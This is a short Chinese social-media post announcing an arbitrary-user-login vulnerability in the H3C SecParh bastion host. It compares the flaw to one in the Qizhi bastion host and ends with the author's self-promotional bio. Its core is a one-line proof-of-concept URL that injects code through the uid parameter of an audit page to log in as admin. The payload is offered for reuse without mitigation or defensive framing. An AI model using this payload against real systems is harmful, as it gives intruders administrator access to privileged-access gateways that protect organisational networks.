点击上方蓝字
给一个关注吧
-
网络设备漏洞
漏洞描述:
H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞
与齐治堡垒机出现的漏洞相似
漏洞复现:
POC:
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
end
个人简介:李白,华为云享专家、阿里云博客专家、CSDN网络领域优质创作者、掘金创作者、BOSS有了创作者、公众号【李白你好】、华为HCIE,全网粉丝3万+。我是一个爱好计算机科学,求索于逻辑思维的同时不忘哲学和浪漫主义科学,乐于分享技术与快乐的博主。博文内容涉及网络¥安全,web渗透测试、内网安全、二进制安全、工业控制安全、app、逆向等。
微信:libaisec
微信交流群:加我微信拉你进群和工程师们学技术聊人生
原文始发于微信公众号(李白你好):H3C SecParh堡垒机任意用户登录
